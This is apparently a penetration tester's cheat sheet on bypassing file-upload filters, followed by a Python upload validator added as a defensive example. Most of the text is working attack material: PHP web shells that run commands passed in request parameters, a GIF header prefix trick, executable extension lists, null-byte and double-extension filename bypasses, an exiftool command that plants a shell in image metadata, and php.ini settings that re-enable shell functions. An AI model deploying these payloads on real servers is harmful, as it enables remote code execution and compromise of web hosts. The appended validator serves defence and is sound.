File Upload bypass

Content

GIF89a1
<?php $a=system($_GET['cmd']); echo $a;?>
<?php system('whoami'); ?>
<?php exec('whoami'); ?>
<?php passthru('whoami'); ?>
<?php shell_exec('whoami'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

Filters

evil.png;.php
evil.gif.php
evil.gif.php5
evil.php;gif
evil.config
evil.htaccess

--other-extensions--
php3
php4
php5
php7
pht
phtm
phtml
phar
phps

Other extensions

PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws

Bypass file extensions checks

-Try upper case: pHp, .pHP5, .PhAr ...
-Add a valid extension before the execution extension: file.png.Php5
-Add special characters at the end. Use Burp Suite Intruder to make it easy.
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
-Try to bypass the protections by tricking the server-side extension parser with techniques like doubling the extension or adding junk data (null bytes) between extensions.
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png

Metatag with exif tool

exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
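
A server-side check that refuses the filename and content tricks listed above, as an added example (not part of the original page). The image-only allowlist, the `validate_upload` name and the sample bodies are assumptions made for illustration.

```python
import re
import uuid

# Assumed policy: image uploads only. Extension -> required leading magic bytes.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}
# Exactly one dot; no separators, control bytes, '%', ';', spaces or trailing dots.
STRICT_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})")
# Heuristic only: PHP open tags hidden in metadata or after a valid header.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(client_name: str, data: bytes) -> tuple[bool, str]:
    """Return (True, server_generated_name) or (False, reason)."""
    m = STRICT_NAME.fullmatch(client_name)
    if m is None:
        return False, "filename is not <name>.<ext> in the strict character set"
    ext = m.group(1).lower()  # case-fold before the allowlist lookup
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not on the allowlist"
    if not data.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match the extension"
    if PHP_TAG.search(data):
        return False, "PHP open tag found in file content"
    # Never reuse the client's name on disk; the extension comes from the allowlist.
    return True, f"{uuid.uuid4().hex}.{ext}"


# Constructed samples: filenames copied from the page, bodies built for this example.
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLES = [
    ("photo.png", PNG),
    ("evil.png;.php", PNG),
    ("file.png.pHp5", PNG),
    ("file.php\x00.png", PNG),
    ("file.php....", PNG),
    ("evil.htaccess", PNG),
    ("avatar.gif", b"GIF89a1<?php /* constructed */ ?>"),
    ("meta.png", PNG + b"tEXtComment\x00<?php /* constructed */ ?>"),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        print(f"{name!r:24} -> {validate_upload(name, body)}")
```

The content scan is a heuristic and can false-positive on binary data. Storing uploads outside the web root under the generated name, and re-encoding images, remain the primary controls.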

php.ini file to bypass restrictions

safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON
shell_exec = ON